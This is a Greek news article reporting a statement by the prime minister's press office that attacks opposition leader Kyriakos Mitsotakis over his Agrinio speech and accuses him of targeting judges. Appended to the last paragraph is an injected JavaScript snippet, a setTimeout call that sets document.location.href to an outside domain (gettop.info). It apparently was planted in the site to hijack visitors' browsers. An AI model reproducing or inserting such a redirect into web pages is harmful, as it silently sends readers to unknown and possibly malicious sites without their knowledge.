Μαξίμου: Απαράδεκτη η τακτική Μητσοτάκη να στοχοποιεί δικαστικούς

0
4

 

Επίθεση στον αρχηγό της αξιωματικής αντιπολίτευσης με αφορμή την ομιλία του χθες στο Αγρίνιο, εξαπέλυσε το Γραφείο Τύπου του πρωθυπουργού, κατηγορώντας τον Κυριάκο Μητσοτάκη για συνέχιση της «απαράδεκτης τακτικής των τελευταίων ημερών να στοχοποιεί δικαστικούς».

Όπως επισημαίνεται, ο πρόεδρος της ΝΔ «πρέπει να πάρει απόφαση ότι αυτό το θεσμικά επικίνδυνο παιχνίδι που παίζει τις τελευταίες ημέρες δεν πρόκειται να αποτρέψει την πλήρη εφαρμογή της νομιμότητας στο τηλεοπτικό τοπίο».

Ειδικότερα στην ανακοίνωσή του, το Γραφείο Τύπου του πρωθυουργού αναφέρει: «Η ομιλία του κ. Μητσοτάκη εχθές στο Αγρίνιο περιείχε εξαιρετικά θετικά σημεία. Ο κ. Μητσοτάκης παραδέχτηκε ότι όλα αυτά τα χρόνια στον τόπο υπήρχε διαπλοκή, χωρίς ωστόσο να ξεκαθαρίσει ποιος ωφελήθηκε από αυτήν, πού πήγαν τα λεφτά της Siemens, τι χρήματα διαχειρίζεται ο κ. Παπασταύρου με τους συνεργάτες του, πώς θα πληρωθούν τα χρέη του κόμματός του και πώς έπαιρνε δάνεια ο Κήρυκας Χανίων.

Επιπλέον ο κ. Μητσοτάκης χαιρέτισε την υλοποίηση δημόσιων έργων τα οποία ξεμπλόκαρε και παρέδωσε η σημερινή κυβέρνηση μετά από δεκαετίες διασπάθισης και καθυστερήσεων» προσθέτει.

Και συνοψίζοντας την αποτίμηση της ομιλίας του σχολιάζει ότι «κατά τα άλλα η ομιλία του ήταν απολύτως προβλέψιμη: Λόγος αποτυχημένου καναλάρχη και αγωνία ότι η θετική έκβαση του ελληνικού προγράμματος και η σταθεροποίηση της οικονομίας θα καταστρέψει τα όνειρά του για την εξουσία».

«Όλα αυτά θα ήταν διασκεδαστικά αν ο κ. Μητσοτάκης δεν συνέχιζε την απαράδεκτη τακτική των τελευταίων ημερών να στοχοποιεί δικαστικούς» αναφέρει και υπογραμμίζει: «Κατανοούμε την αγωνία του, αλλά θα πρέπει να πάρει απόφαση ότι αυτό το θεσμικά επικίνδυνο παιχνίδι που παίζει τις τελευταίες ημέρες δεν πρόκειται να αποτρέψει την πλήρη εφαρμογή της νομιμότητας στο τηλεοπτικό τοπίο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here